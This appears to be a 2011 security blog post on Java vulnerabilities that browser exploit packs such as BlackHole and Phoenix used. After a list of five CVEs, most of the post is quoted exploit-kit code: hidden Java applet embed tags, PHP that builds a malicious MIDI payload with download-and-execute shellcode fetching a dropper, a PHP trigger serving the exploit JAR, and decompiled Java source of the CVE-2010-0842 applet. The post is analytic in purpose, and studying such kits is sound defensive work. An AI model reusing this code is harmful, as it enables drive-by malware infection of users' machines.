Wednesday, May 4, 2011

Finest 5 - Java Exploits on Fire

Since the origin of browser exploit packs, we have noticed a serious change in the effectiveness of exploitation ratio due to origin of critical vulnerabilities. However, we have noticed and observed recently about the explicit use of Java vulnerabilities by Browser Exploit Packs (BEP's). Java has become the most prominent exploitation vector now a days. BEP's such as BlackHole and Phoenix are using Java exploits explicitly for triggering infections. Consequentially, the highest infection rate is an outcome of these Java exploits.

Java being platform independent is the preferred choice of attackers in order to attack victim machines. The Java exploits that are on fire are as follows

1. Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (CVE-2010-0840)

2. Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
(CVE-2010-0842) | Java JMF MIDI

3. Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE (CVE-2010-0886)

4. Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (CVE-2010-0094) | Java RMI

5. Java argument injection vulnerability in the URI handler in Java NPAPI plugin (CVE-2010-1423)


The latest addition to Java exploit is CVE-2010-4452 which presents a flaw exists within the findClass method of the sun.plugin2.applet.Applet2ClassLoader class.

Serving these exploits are quite easy by simply pushing Jar file as follows

[object id="java_obj" classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" width="0" height="0"]
[PARAM name="launchjnlp" value="1"]
[PARAM name="docbase" value="]
[/object]
[embed type="application/x-java-applet" width="0" height="0" launchjnlp="1" docbase="';

include '../config.php';
include '../include/shellcode.php';
$shellcode = shellcode_dl_exec ($config_url . '/drop.php?e=Java-2010-0842');
$rmf = 'IREZ' . 'SONGmSËm' . ' ' . '' . '' . 'ITLŸ±µ
~ûpœ†þ°5' . '“â^Þ÷' . 'ÿ' . '' . '8ÿ ÉPQRSVW' . $shellcode;
header ('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
header ('Cache-Control: no-cache');
header ('Pragma: no-cache');
header ('Accept-Ranges: bytes');
header ('Content-Length: ' . strlen ($rmf) . '');
header ('Content-Disposition: inline; filename=midi20100842.rmf');
header ('');
header ('Content-Type: application/x-msdownload');


So we cannot ignore the easiness of spreading malware by exploiting Java vulnerabilities. For example consider the below stated exploit trigger

include_once 'config.php';
echo ' [Applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
echo '" width="0" Height="1"]
[PARAM NAME="URL" VALUETYPE="ref" VALUE="';
echo $config_url . '/exploits/Java-2010-0842Helper.php';
[/applet]';


On decompiling Java-2010-0842.jar, we get
import java.applet.Applet;
import java.io.*;
import javax.sound.midi.*;
public class ToolsDemo extends Applet
{
public ToolsDemo(){}

public void init()
{
String s = getParameter("URL");
try
{
InputStream inputstream = getClass().getResourceAsStream(s);
ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
byte abyte0[] = new byte[1024];
int i;
while((i = inputstream.read(abyte0)) != -1)
bytearrayoutputstream.write(abyte0, 0, i);
ByteArrayInputStream bytearrayinputstream = new ByteArrayInputStream(bytearrayoutputstream.toByteArray());
ToolsDemoSubClass toolsdemosubclass = new ToolsDemoSubClass();
javax.sound.midi.MidiDevice.Info ainfo[] = MidiSystem.getMidiDeviceInfo();
MidiDevice mididevice = MidiSystem.getMidiDevice(ainfo[0]);
Sequencer sequencer = null;
sequencer = (Sequencer)mididevice;
sequencer.open();
sequencer.setSequence(bytearrayinputstream);
sequencer.addControllerEventListener(toolsdemosubclass, new int[] {
0
});
sequencer.start();
}
catch(Exception exception) { }
}

public String getAppletInfo(){return "Tools Demo";}
}


Something is really on fire :)